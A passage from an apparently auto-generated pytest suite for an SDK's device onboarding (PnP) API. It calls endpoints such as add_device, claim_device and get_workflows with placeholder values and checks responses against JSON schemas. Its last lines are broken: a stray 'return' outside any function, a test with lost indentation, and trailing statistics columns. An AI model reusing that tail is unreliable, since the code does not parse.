        deviceResetList=[{'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'deviceId': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}],
        payload=None,
        projectId='string',
        workflowId='string'
    )


@pytest.mark.device_onboarding_pnp
def test_reset_device(api, validator):
    response = reset_device(api)
    assert is_valid_reset_device(validator, response)


def reset_device_default(api):
    """Call the endpoint with its default (None) argument set."""
    return api.device_onboarding_pnp.reset_device(
        active_validation=True,
        deviceResetList=None,
        payload=None,
        projectId=None,
        workflowId=None
    )


@pytest.mark.device_onboarding_pnp
def test_reset_device_default(api, validator):
    # A TypeError mentioning a missing (None) argument is the accepted outcome.
    try:
        response = reset_device_default(api)
        assert is_valid_reset_device(validator, response)
    except Exception as original_e:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise original_e
def is_valid_get_workflows(json_schema_validate, obj):
    """Return True when obj conforms to the get_workflows response schema."""
    schema = json_schema_validate('jsd_aeb4dad04a99bbe3_v1_3_1')
    schema.validate(obj)
    return True
def get_workflows(api):
    """Fetch workflows using every supported query filter (placeholder values)."""
    query = {
        'limit': 0,
        'name': 'value1,value2',
        'offset': 0,
        'sort': 'value1,value2',
        'sort_order': 'string',
        'type': 'value1,value2',
    }
    return api.device_onboarding_pnp.get_workflows(**query)
@pytest.mark.device_onboarding_pnp
def test_get_workflows(api, validator):
    """Live get_workflows response must satisfy its JSON schema."""
    response = get_workflows(api)
    assert is_valid_get_workflows(validator, response)
def get_workflows_default(api):
    """Invoke get_workflows with every filter omitted (None)."""
    query = dict.fromkeys(
        ['limit', 'name', 'offset', 'sort', 'sort_order', 'type'])
    return api.device_onboarding_pnp.get_workflows(**query)
@pytest.mark.device_onboarding_pnp
def test_get_workflows_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_get_workflows(validator, get_workflows_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_get_device_by_id(json_schema_validate, obj):
    """Return True when obj conforms to the get_device_by_id response schema."""
    schema = json_schema_validate('jsd_bab6c9e5440885cc_v1_3_1')
    schema.validate(obj)
    return True
def get_device_by_id(api):
    """Fetch a single PnP device by its (placeholder) identifier."""
    return api.device_onboarding_pnp.get_device_by_id(id='string')
@pytest.mark.device_onboarding_pnp
def test_get_device_by_id(api, validator):
    """Live get_device_by_id response must satisfy its JSON schema."""
    response = get_device_by_id(api)
    assert is_valid_get_device_by_id(validator, response)
def get_device_by_id_default(api):
    """Default-call variant; `id` is a required path parameter so it keeps its placeholder."""
    return api.device_onboarding_pnp.get_device_by_id(id='string')
@pytest.mark.device_onboarding_pnp
def test_get_device_by_id_default(api, validator):
    """Default call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_get_device_by_id(validator, get_device_by_id_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_get_device_count(json_schema_validate, obj):
    """Return True when obj conforms to the get_device_count response schema."""
    schema = json_schema_validate('jsd_d9a1fa9c4068b23c_v1_3_1')
    schema.validate(obj)
    return True
def get_device_count(api):
    """Count PnP devices matching every supported filter (placeholder values)."""
    string_filters = {name: 'value1,value2' for name in (
        'cm_state', 'name', 'onb_state', 'pid', 'project_id',
        'project_name', 'serial_number', 'smart_account_id', 'source',
        'state', 'virtual_account_id', 'workflow_id', 'workflow_name')}
    return api.device_onboarding_pnp.get_device_count(
        last_contact=True, **string_filters)
@pytest.mark.device_onboarding_pnp
def test_get_device_count(api, validator):
    """Live get_device_count response must satisfy its JSON schema."""
    response = get_device_count(api)
    assert is_valid_get_device_count(validator, response)
def get_device_count_default(api):
    """Invoke get_device_count with every filter omitted (None)."""
    filters = dict.fromkeys(
        ['cm_state', 'last_contact', 'name', 'onb_state', 'pid',
         'project_id', 'project_name', 'serial_number', 'smart_account_id',
         'source', 'state', 'virtual_account_id', 'workflow_id',
         'workflow_name'])
    return api.device_onboarding_pnp.get_device_count(**filters)
@pytest.mark.device_onboarding_pnp
def test_get_device_count_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_get_device_count(validator, get_device_count_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_get_device_history(json_schema_validate, obj):
    """Return True when obj conforms to the get_device_history response schema."""
    schema = json_schema_validate('jsd_f09319674049a7d4_v1_3_1')
    schema.validate(obj)
    return True
def get_device_history(api):
    """Fetch a device's PnP history by serial number (placeholder values)."""
    query = {
        'serial_number': 'string',
        'sort': 'value1,value2',
        'sort_order': 'string',
    }
    return api.device_onboarding_pnp.get_device_history(**query)
@pytest.mark.device_onboarding_pnp
def test_get_device_history(api, validator):
    """Live get_device_history response must satisfy its JSON schema."""
    response = get_device_history(api)
    assert is_valid_get_device_history(validator, response)
def get_device_history_default(api):
    """Invoke get_device_history with every parameter omitted (None)."""
    query = dict.fromkeys(['serial_number', 'sort', 'sort_order'])
    return api.device_onboarding_pnp.get_device_history(**query)
@pytest.mark.device_onboarding_pnp
def test_get_device_history_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_get_device_history(validator, get_device_history_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_delete_device_by_id_from_pnp(json_schema_validate, obj):
    """Return True when obj conforms to the delete_device_by_id_from_pnp response schema."""
    schema = json_schema_validate('jsd_cdab9b474899ae06_v1_3_1')
    schema.validate(obj)
    return True
def delete_device_by_id_from_pnp(api):
    """Delete a PnP device by its (placeholder) identifier."""
    return api.device_onboarding_pnp.delete_device_by_id_from_pnp(id='string')
@pytest.mark.device_onboarding_pnp
def test_delete_device_by_id_from_pnp(api, validator):
    """Live delete_device_by_id_from_pnp response must satisfy its JSON schema."""
    response = delete_device_by_id_from_pnp(api)
    assert is_valid_delete_device_by_id_from_pnp(validator, response)
def delete_device_by_id_from_pnp_default(api):
    """Default-call variant; `id` is a required path parameter so it keeps its placeholder."""
    return api.device_onboarding_pnp.delete_device_by_id_from_pnp(id='string')
@pytest.mark.device_onboarding_pnp
def test_delete_device_by_id_from_pnp_default(api, validator):
    """Default call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_delete_device_by_id_from_pnp(
            validator, delete_device_by_id_from_pnp_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_import_devices_in_bulk(json_schema_validate, obj):
    """Return True when obj conforms to the import_devices_in_bulk response schema."""
    schema = json_schema_validate('jsd_21a6db2540298f55_v1_3_1')
    schema.validate(obj)
    return True
def import_devices_in_bulk(api):
    """Bulk-import a single fully-populated placeholder device record.

    The payload is an auto-generated maximal example of the import schema
    (every field present with 'string'/0/True placeholders); it exists purely
    to exercise request validation against the endpoint.
    """
    endpoint_result = api.device_onboarding_pnp.import_devices_in_bulk(
        active_validation=True,
        payload=[{'_id': 'string', 'deviceInfo': {'aaaCredentials': {'password': 'string', 'username': 'string'}, 'addedOn': 0, 'addnMacAddrs': ['string'], 'agentType': 'POSIX', 'authStatus': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'cmState': 'NotContacted', 'description': 'string', 'deviceSudiSerialNos': ['string'], 'deviceType': 'string', 'featuresSupported': ['string'], 'fileSystemList': [{'freespace': 0, 'name': 'string', 'readable': True, 'size': 0, 'type': 'string', 'writeable': True}], 'firstContact': 0, 'hostname': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'imageFile': 'string', 'imageVersion': 'string', 'ipInterfaces': [{'ipv4Address': {}, 'ipv6AddressList': [{}], 'macAddress': 'string', 'name': 'string', 'status': 'string'}], 'lastContact': 0, 'lastSyncTime': 0, 'lastUpdateOn': 0, 'location': {'address': 'string', 'altitude': 'string', 'latitude': 'string', 'longitude': 'string', 'siteId': 'string'}, 'macAddress': 'string', 'mode': 'string', 'name': 'string', 'neighborLinks': [{'localInterfaceName': 'string', 'localMacAddress': 'string', 'localShortInterfaceName': 'string', 'remoteDeviceName': 'string', 'remoteInterfaceName': 'string', 'remoteMacAddress': 'string', 'remotePlatform': 'string', 'remoteShortInterfaceName': 'string', 'remoteVersion': 'string'}], 'onbState': 'NotContacted', 'pid': 'string', 'pnpProfileList': [{'createdBy': 'string', 'discoveryCreated': True, 'primaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}, 'profileName': 'string', 'secondaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}}], 'populateInventory': True, 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'projectId': 'string', 'projectName': 'string', 'reloadRequested': True, 'serialNumber': 'string', 'smartAccountId': 'string', 'source': 
        'string', 'stack': True, 'stackInfo': {'isFullRing': True, 'stackMemberList': [{'hardwareVersion': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'macAddress': 'string', 'pid': 'string', 'priority': 0, 'role': 'string', 'serialNumber': 'string', 'softwareVersion': 'string', 'stackNumber': 0, 'state': 'string', 'sudiSerialNumber': 'string'}], 'stackRingProtocol': 'string', 'supportsStackWorkflows': True, 'totalMemberCount': 0, 'validLicenseLevels': ['string']}, 'state': 'Unclaimed', 'sudiRequired': True, 'tags': {}, 'userSudiSerialNos': ['string'], 'virtualAccountId': 'string', 'workflowId': 'string', 'workflowName': 'string'}, 'runSummaryList': [{'details': 'string', 'errorFlag': True, 'historyTaskInfo': {'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string', 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}, 'timestamp': 0}], 'systemResetWorkflow': {'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0}, 'systemWorkflow': {'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 
        'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0}, 'tenantId': 'string', 'version': 0, 'workflow': {'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0}, 'workflowParameters': {'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}}]
    )
    return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_import_devices_in_bulk(api, validator):
    """Live import_devices_in_bulk response must satisfy its JSON schema."""
    response = import_devices_in_bulk(api)
    assert is_valid_import_devices_in_bulk(validator, response)
def import_devices_in_bulk_default(api):
    """Invoke import_devices_in_bulk with no payload."""
    return api.device_onboarding_pnp.import_devices_in_bulk(
        active_validation=True, payload=None)
@pytest.mark.device_onboarding_pnp
def test_import_devices_in_bulk_default(api, validator):
    """Empty-payload call must validate or fail with the known TypeError."""
    try:
        assert is_valid_import_devices_in_bulk(
            validator, import_devices_in_bulk_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_update_workflow(json_schema_validate, obj):
    """Return True when obj conforms to the update_workflow response schema."""
    schema = json_schema_validate('jsd_3086c9624f498b85_v1_3_1')
    schema.validate(obj)
    return True
def update_workflow(api):
    """Update a workflow with every field populated (schema placeholders).

    Exercises request validation for update_workflow; returns the raw
    endpoint result for the live schema test below.
    """
    endpoint_result = api.device_onboarding_pnp.update_workflow(
        _id='string',
        active_validation=True,
        addToInventory=True,
        addedOn=0,
        configId='string',
        currTaskIdx=0,
        description='string',
        endTime=0,
        execTime=0,
        id='string',
        imageId='string',
        instanceType='SystemWorkflow',
        lastupdateOn=0,
        name='string',
        payload=None,
        startTime=0,
        state='string',
        tasks=[{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}],
        tenantId='string',
        type='string',
        useState='string',
        version=0
    )
    return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_workflow(api, validator):
    """Live update_workflow response must satisfy its JSON schema."""
    response = update_workflow(api)
    assert is_valid_update_workflow(validator, response)
def update_workflow_default(api):
    """Update workflow 'string' passing None for every optional field
    (`id` is a required path parameter, so it keeps its placeholder)."""
    optional = dict.fromkeys(
        ['_id', 'addToInventory', 'addedOn', 'configId', 'currTaskIdx',
         'description', 'endTime', 'execTime', 'imageId', 'instanceType',
         'lastupdateOn', 'name', 'payload', 'startTime', 'state', 'tasks',
         'tenantId', 'type', 'useState', 'version'])
    return api.device_onboarding_pnp.update_workflow(
        active_validation=True, id='string', **optional)
@pytest.mark.device_onboarding_pnp
def test_update_workflow_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_update_workflow(validator, update_workflow_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_get_pnp_global_settings(json_schema_validate, obj):
    """Return True when obj conforms to the get_pnp_global_settings response schema."""
    schema = json_schema_validate('jsd_7e92f9eb46db8320_v1_3_1')
    schema.validate(obj)
    return True
def get_pnp_global_settings(api):
    """Fetch the PnP global settings (endpoint takes no parameters)."""
    return api.device_onboarding_pnp.get_pnp_global_settings()
@pytest.mark.device_onboarding_pnp
def test_get_pnp_global_settings(api, validator):
    """Live get_pnp_global_settings response must satisfy its JSON schema."""
    response = get_pnp_global_settings(api)
    assert is_valid_get_pnp_global_settings(validator, response)
def get_pnp_global_settings_default(api):
    """Default-call variant; identical to the populated call (no parameters exist)."""
    return api.device_onboarding_pnp.get_pnp_global_settings()
@pytest.mark.device_onboarding_pnp
def test_get_pnp_global_settings_default(api, validator):
    """Default call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_get_pnp_global_settings(
            validator, get_pnp_global_settings_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_update_pnp_global_settings(json_schema_validate, obj):
    """Return True when obj conforms to the update_pnp_global_settings response schema."""
    schema = json_schema_validate('jsd_8da0391947088a5a_v1_3_1')
    schema.validate(obj)
    return True
def update_pnp_global_settings(api):
    """Update PnP global settings with every field populated (schema placeholders).

    Exercises request validation; returns the raw endpoint result for the
    live schema test below.
    """
    endpoint_result = api.device_onboarding_pnp.update_pnp_global_settings(
        _id='string',
        aaaCredentials={'password': 'string', 'username': 'string'},
        acceptEula=True,
        active_validation=True,
        defaultProfile={'cert': 'string', 'fqdnAddresses': ['string'], 'ipAddresses': ['string'], 'port': 0, 'proxy': True},
        payload=None,
        savaMappingList=[{'autoSyncPeriod': 0, 'ccoUser': 'string', 'expiry': 0, 'lastSync': 0, 'profile': {'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True}, 'smartAccountId': 'string', 'syncResult': {'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'}, 'syncResultStr': 'string', 'syncStartTime': 0, 'syncStatus': 'NOT_SYNCED', 'tenantId': 'string', 'token': 'string', 'virtualAccountId': 'string'}],
        taskTimeOuts={'configTimeOut': 0, 'generalTimeOut': 0, 'imageDownloadTimeOut': 0},
        tenantId='string',
        version=0
    )
    return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_pnp_global_settings(api, validator):
    """Live update_pnp_global_settings response must satisfy its JSON schema."""
    response = update_pnp_global_settings(api)
    assert is_valid_update_pnp_global_settings(validator, response)
def update_pnp_global_settings_default(api):
    """Invoke update_pnp_global_settings with every optional field omitted (None)."""
    optional = dict.fromkeys(
        ['_id', 'aaaCredentials', 'acceptEula', 'defaultProfile', 'payload',
         'savaMappingList', 'taskTimeOuts', 'tenantId', 'version'])
    return api.device_onboarding_pnp.update_pnp_global_settings(
        active_validation=True, **optional)
@pytest.mark.device_onboarding_pnp
def test_update_pnp_global_settings_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_update_pnp_global_settings(
            validator, update_pnp_global_settings_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_delete_workflow_by_id(json_schema_validate, obj):
    """Return True when obj conforms to the delete_workflow_by_id response schema."""
    schema = json_schema_validate('jsd_af8d7b0e470b8ae2_v1_3_1')
    schema.validate(obj)
    return True
def delete_workflow_by_id(api):
    """Delete a workflow by its (placeholder) identifier."""
    return api.device_onboarding_pnp.delete_workflow_by_id(id='string')
@pytest.mark.device_onboarding_pnp
def test_delete_workflow_by_id(api, validator):
    """Live delete_workflow_by_id response must satisfy its JSON schema."""
    response = delete_workflow_by_id(api)
    assert is_valid_delete_workflow_by_id(validator, response)
def delete_workflow_by_id_default(api):
    """Default-call variant; `id` is a required path parameter so it keeps its placeholder."""
    return api.device_onboarding_pnp.delete_workflow_by_id(id='string')
@pytest.mark.device_onboarding_pnp
def test_delete_workflow_by_id_default(api, validator):
    """Default call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_delete_workflow_by_id(
            validator, delete_workflow_by_id_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_add_device(json_schema_validate, obj):
    """Return True when obj conforms to the add_device response schema."""
    schema = json_schema_validate('jsd_f3b26b5544cabab9_v1_3_1')
    schema.validate(obj)
    return True
def add_device(api):
    """Add a PnP device with every field populated (schema placeholders).

    The nested literals are an auto-generated maximal example of the device
    schema used purely to exercise request validation against the endpoint.
    """
    endpoint_result = api.device_onboarding_pnp.add_device(
        _id='string',
        active_validation=True,
        deviceInfo={'aaaCredentials': {'password': 'string', 'username': 'string'}, 'addedOn': 0, 'addnMacAddrs': ['string'], 'agentType': 'POSIX', 'authStatus': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'cmState': 'NotContacted', 'description': 'string', 'deviceSudiSerialNos': ['string'], 'deviceType': 'string', 'featuresSupported': ['string'], 'fileSystemList': [{'freespace': 0, 'name': 'string', 'readable': True, 'size': 0, 'type': 'string', 'writeable': True}], 'firstContact': 0, 'hostname': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'imageFile': 'string', 'imageVersion': 'string', 'ipInterfaces': [{'ipv4Address': {}, 'ipv6AddressList': [{}], 'macAddress': 'string', 'name': 'string', 'status': 'string'}], 'lastContact': 0, 'lastSyncTime': 0, 'lastUpdateOn': 0, 'location': {'address': 'string', 'altitude': 'string', 'latitude': 'string', 'longitude': 'string', 'siteId': 'string'}, 'macAddress': 'string', 'mode': 'string', 'name': 'string', 'neighborLinks': [{'localInterfaceName': 'string', 'localMacAddress': 'string', 'localShortInterfaceName': 'string', 'remoteDeviceName': 'string', 'remoteInterfaceName': 'string', 'remoteMacAddress': 'string', 'remotePlatform': 'string', 'remoteShortInterfaceName': 'string', 'remoteVersion': 'string'}], 'onbState': 'NotContacted', 'pid': 'string', 'pnpProfileList': [{'createdBy': 'string', 'discoveryCreated': True, 'primaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}, 'profileName': 'string', 'secondaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}}], 'populateInventory': True, 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'projectId': 'string', 'projectName': 'string', 'reloadRequested': True, 'serialNumber': 'string', 'smartAccountId': 'string', 'source': 'string', 'stack': True, 
        'stackInfo': {'isFullRing': True, 'stackMemberList': [{'hardwareVersion': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'macAddress': 'string', 'pid': 'string', 'priority': 0, 'role': 'string', 'serialNumber': 'string', 'softwareVersion': 'string', 'stackNumber': 0, 'state': 'string', 'sudiSerialNumber': 'string'}], 'stackRingProtocol': 'string', 'supportsStackWorkflows': True, 'totalMemberCount': 0, 'validLicenseLevels': ['string']}, 'state': 'Unclaimed', 'sudiRequired': True, 'tags': {}, 'userSudiSerialNos': ['string'], 'virtualAccountId': 'string', 'workflowId': 'string', 'workflowName': 'string'},
        payload=None,
        runSummaryList=[{'details': 'string', 'errorFlag': True, 'historyTaskInfo': {'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string', 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}, 'timestamp': 0}],
        systemResetWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
        systemWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
        tenantId='string',
        version=0,
        workflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
        workflowParameters={'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}
    )
    return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_device(api, validator):
    """Live add_device response must satisfy its JSON schema."""
    response = add_device(api)
    assert is_valid_add_device(validator, response)
def add_device_default(api):
    """Invoke add_device with every optional field omitted (None)."""
    optional = dict.fromkeys(
        ['_id', 'deviceInfo', 'payload', 'runSummaryList',
         'systemResetWorkflow', 'systemWorkflow', 'tenantId', 'version',
         'workflow', 'workflowParameters'])
    return api.device_onboarding_pnp.add_device(
        active_validation=True, **optional)
@pytest.mark.device_onboarding_pnp
def test_add_device_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_add_device(validator, add_device_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_preview_config(json_schema_validate, obj):
    """Return True when obj is truthy (no JSON schema exists for preview_config).

    Unlike the sibling validators, this endpoint has no generated schema, so
    validity degrades to a truthiness check; `json_schema_validate` is
    accepted only for signature parity and is unused.
    """
    # `True if obj else False` is just bool(obj) — use the idiomatic form.
    return bool(obj)
def preview_config(api):
    """Preview a device configuration for a site (placeholder values)."""
    body = {
        'deviceId': 'string',
        'payload': None,
        'siteId': 'string',
        'type': 'Default',
    }
    return api.device_onboarding_pnp.preview_config(
        active_validation=True, **body)
@pytest.mark.device_onboarding_pnp
def test_preview_config(api, validator):
    """Live preview_config response must pass the truthiness validator."""
    response = preview_config(api)
    assert is_valid_preview_config(validator, response)
def preview_config_default(api):
    """Invoke preview_config with every optional field omitted (None)."""
    body = dict.fromkeys(['deviceId', 'payload', 'siteId', 'type'])
    return api.device_onboarding_pnp.preview_config(
        active_validation=True, **body)
@pytest.mark.device_onboarding_pnp
def test_preview_config_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_preview_config(validator, preview_config_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_claim_device(json_schema_validate, obj):
    """Return True when obj conforms to the claim_device response schema."""
    schema = json_schema_validate('jsd_d8a619974a8a8c48_v1_3_1')
    schema.validate(obj)
    return True
def claim_device(api):
    """Claim a PnP device with every field populated (schema placeholders).

    Exercises request validation for claim_device; returns the raw endpoint
    result for the live schema test below.
    """
    endpoint_result = api.device_onboarding_pnp.claim_device(
        active_validation=True,
        configFileUrl='string',
        configId='string',
        deviceClaimList=[{'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'deviceId': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}],
        fileServiceId='string',
        imageId='string',
        imageUrl='string',
        payload=None,
        populateInventory=True,
        projectId='string',
        workflowId='string'
    )
    return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_claim_device(api, validator):
    """Live claim_device response must satisfy its JSON schema."""
    response = claim_device(api)
    assert is_valid_claim_device(validator, response)
def claim_device_default(api):
    """Invoke claim_device with every optional field omitted (None)."""
    optional = dict.fromkeys(
        ['configFileUrl', 'configId', 'deviceClaimList', 'fileServiceId',
         'imageId', 'imageUrl', 'payload', 'populateInventory', 'projectId',
         'workflowId'])
    return api.device_onboarding_pnp.claim_device(
        active_validation=True, **optional)
@pytest.mark.device_onboarding_pnp
def test_claim_device_default(api, validator):
    """All-None call must validate or fail with the known missing-param TypeError."""
    try:
        assert is_valid_claim_device(validator, claim_device_default(api))
    except Exception as exc:
        with pytest.raises(TypeError, match="but instead we received None"):
            raise exc
def is_valid_get_device_list(json_schema_validate, obj):
    """Return True when obj conforms to the get_device_list response schema."""
    schema = json_schema_validate('jsd_e6b3db8046c99654_v1_3_1')
    schema.validate(obj)
    return True
def get_device_list(api):
    """List PnP devices using every supported filter and paging option."""
    string_filters = {name: 'value1,value2' for name in (
        'cm_state', 'name', 'onb_state', 'pid', 'project_id',
        'project_name', 'serial_number', 'smart_account_id', 'sort',
        'source', 'state', 'virtual_account_id', 'workflow_id',
        'workflow_name')}
    return api.device_onboarding_pnp.get_device_list(
        last_contact=True, limit=0, offset=0, sort_order='string',
        **string_filters)
@pytest.mark.device_onboarding_pnp
def test_get_device_list(api, validator):
    """Live get_device_list response must satisfy its JSON schema."""
    response = get_device_list(api)
    assert is_valid_get_device_list(validator, response)
def get_device_list_default(api):
    """Invoke get_device_list with every filter omitted (None)."""
    filters = dict.fromkeys(
        ['cm_state', 'last_contact', 'limit', 'name', 'offset', 'onb_state',
         'pid', 'project_id', 'project_name', 'serial_number',
         'smart_account_id', 'sort', 'sort_order', 'source', 'state',
         'virtual_account_id', 'workflow_id', 'workflow_name'])
    return api.device_onboarding_pnp.get_device_list(**filters)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_list_default(api, validator):
try:
assert is_valid_get_device_list(
validator,
get_device_list_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
| 38.391304
| 5,192
| 0.678033
| 6,292
| 56,512
